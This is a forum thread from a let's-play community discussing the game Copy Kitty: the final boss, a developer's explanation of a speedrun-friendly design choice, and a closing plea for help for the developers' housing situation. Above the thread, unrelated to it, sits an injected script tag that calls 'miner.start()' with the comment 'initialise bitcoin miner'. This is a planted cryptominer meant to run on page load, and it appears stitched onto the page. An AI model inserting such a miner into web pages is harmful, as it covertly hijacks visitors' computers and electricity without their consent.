<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

Copy Kitty - Imitation is the besterest form of flattery

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Sebby19

Re: Copy Kitty - Imitation is the besterest form of flattery

Postby Sebby19 » 8 months ago

So there is probably an achievement if you can beat the last phase without dying. How does that effect the finishing blow, though?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

Piesonscreations
First name: Gon
Pronouns: he/him/his

Postby Piesonscreations » 8 months ago

That boss was astounding.

Azure Lazuline
Pronouns: choose randomly

Postby Azure Lazuline » 8 months ago

Sebby19 wrote: So there is probably an achievement if you can beat the last phase without dying. How does that effect the finishing blow, though?
There's no achievement for it. If you do well enough at the battle as a whole, then Boki copies the final powerup after a few dark-phase attacks instead of needing to resurrect for it, and the rest of the battle continues as normal. It's honestly not as cool as the normal way though. (I did this just so speedruns wouldn't need to intentionally take tons of hits and look really bad, that bugged the heck out of me in Megaman X and other stuff with forced deaths)
Me and Raibys made Copy Kitty! Now we're working on another game, about fruit and hugs.
http://entanma.com
https://www.patreon.com/NuclearStrawberry

Super Llama
Love is stored in the robot

Postby Super Llama » 8 months ago

kitikami wrote: It's remarkable how a game whose entire concept revolves around copying your enemies still manages to surprise you with what you can do. The whole resurrection phase was amazing, but cursing the dark-phoenix hunter and watching it helplessly sprinkle snakes everywhere really put this fight over the top.
Even long-standing series revolving around copying your opponents' abilities like Mega Man and Kirby don't go particularly far with it. Not counting this game, the farthest I've seen a game go with the concept is ZX Advent, and even then it still tends to withhold the more awesome moves from you.

Dark Hunter

Postby Dark Hunter » 8 months ago

Last world was Puzzle World, this world is just straight up EXPLOSIONS EVERYWHERE.

Also, Rainbow Text Man always good for laughing at how angry he is.

kitikami

Postby kitikami » 8 months ago

If there is one thing I would change about this game, it would be to rename Frag Missile to Frog Missile whenever your explode component comes from a frog-a-loo.

Azure Lazuline
Pronouns: choose randomly

Postby Azure Lazuline » 8 months ago

That was actually a really interesting solution for the first turret? You're supposed to just stand on the starting platform and either shoot diagonally or use jump shots, but you found a different way that's also completely reliable. I've never seen it before and it's a clever way to get around their AI!

Good luck on the finale!
Me and Raibys made Copy Kitty! Now we're working on another game, about fruit and hugs.
http://entanma.com
https://www.patreon.com/NuclearStrawberry

SAJewers
hi

Postby SAJewers » 8 months ago

Azure Lazuline wrote: That was actually a really interesting solution for the first turret? You're supposed to just stand on the starting platform and either shoot diagonally or use jump shots, but you found a different way that's also completely reliable. I've never seen it before and it's a clever way to get around their AI!

Good luck on the finale!
It's actually kinda hilarious (and a little aggravating) watching him come up with these strategies that end up making things a ton harder for himself
ImageImageImageImageImage
ImageImageImageImage

freshtalk

Postby freshtalk » 8 months ago

Don't have much to say that others haven't, but I'm definitely going to be buying this game for myself. It's great and so has watching raocow LP it.

Mea

Postby Mea » 8 months ago

It wasn't until this final Final episode at the achievement unlock that I realized that the title is a pun on Copy Cat. After all these years.

Awoo
Wolf girls? In *my* area? It's more likely than you think!

Re: Copy Citty - Imitation is the bastet form of flattery

Postby Awoo » 8 months ago

Mea wrote: final Final
I misread that as "Final Five"
ワンワン :pal:

Piesonscreations
First name: Gon

Postby Piesonscreations » 8 months ago

God that final boss was amazing. I'm really looking forward to more Copy Kitty in the future! Especially since people really seem to live the other modes as well.

Blivsey
forever an obscure pokemons
First name: Liv
Pronouns: she/her

Postby Blivsey » 8 months ago

it was halfway through the fight when i had the wonderful epiphany of "ohhhhoho we're gonna copy that laser aren't we"

I love this game. I need to buy it, and also recommend it to literally all of my friends.
convenient noise thread for stress-relief purposes

kitikami

Postby kitikami » 8 months ago

The laser is so well done. Seeing it earlier and not knowing what it is or where it came from, and then finally seeing the source and getting to copy it for the finishing blow feels amazing.

This game has been a fantastic ride every time raocow has LP'd it. It's pretty much pure happiness for me. The finished product added a lot of polish too, so even though it still has the same distinct flavor as past versions, this one still felt like a new experience. I really enjoyed the pacing and how each world escalated up to a satisfying conclusion. Great work by Azure and Raibys, and anyone else involved.

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 8 months ago

It's a cool fight, but personally I felt that the first phase went on for too long. This is the main reason I haven't gotten around to getting the gold star for that fight yet (I have it on all the other levels outside of Extra World).
Click that banner if you like reading words.
Make levels from unused MAGL X names!

leafbarrett

Postby leafbarrett » 2 months ago

Six months later, here I am again. As much as I wish I could say the new LP solved Azure and Raibys's problems... it hasn't. This is the current state of affairs. Summary: They're being uprooted for the second time in a month, and need help getting temporary housing while they try to get things back in order. I can't help with this, nor can I provide any meaningful financial contribution to help them. And so here I am, begging somebody to help my friends stay off the streets.

The idea of introducing the game to more streamers was brought up, and the official Copy Kitty website already has a press kit prepared, so if anybody here happens to have any connections with streamers, if you could get the word out, that would be much appreciated too.

I don't know where to turn, this is the only community I'm in that has any idea what Copy Kitty is in the first place, but dammit, there must be somebody on the face of this godforsaken planet that can help.

Return to “let's play”